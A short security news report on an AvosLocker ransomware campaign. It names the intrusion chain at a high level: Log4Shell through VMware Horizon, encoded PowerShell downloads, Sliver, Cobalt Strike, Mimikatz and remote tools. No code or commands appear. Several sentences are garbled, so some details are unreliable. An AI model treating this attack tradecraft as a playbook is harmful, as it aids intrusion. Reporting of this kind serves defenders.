Cybersecurity researchers have monitored a month-long threat campaign operated by the AvosLocker group that has expanded its arsenal and utilised several tools to aid its attacks.
The researchers said they discovered the AvosLocker looking for exposed networks to compromise. The adversaries have used various tools, such as Sliver, Cobalt Strike beacon, and numerous commercially available network scanners.
In this malicious activity, the attackers have targeted an ESXi server exposed on the internet after exploiting Log4Shell’s critical flaw through the VMWare Horizon UAG. During the initial stages of the attacks, the operators employed multiple strategies to obtain a foothold on their target’s network.
Furthermore, researchers discovered numerous other payloads and tools on endpoints, including LOLBins.
The AvosLocker group utilised another set of tools from the initial intrusion of its attack.
The AvosLocker operators also used WMI Provider Host on a Windows Server for the initial access point in executing an encoded PowerShell script. The group also utilised the hand along with the DownloadString method last February.
After a couple of days, the researchers then detected a dot exe file called “RuntimeBrokerService[.]exe” for developing a file named watcher[.]exe. However, these files seem connected to a crypto-miner instead of AvosLocker.
Several weeks later, another encoded PowerShell command was running through the DownloadString method. Subsequently, the threat actors executed more PowerShell scripts to download and operate the Sliver malware. The scripts also download the Cobalt Strike beacon and Mimikatz payload.
The threat group has also exploited that SoftPerfect Network scanner transferred via AnyDesk to another server. Additionally, the PDQ deploy a software deployment kit as authentic tools during the threat campaign.
The AvosLocker ransomware group is expanding its arsenal with more malicious and legitimate tools. The latest campaign has shown the great significance of applying hotfixes, patches, and updates whenever available. Cybersecurity experts advise users to employ a reliable and competent anti-malware solution that monitors its client’s system to stay protected.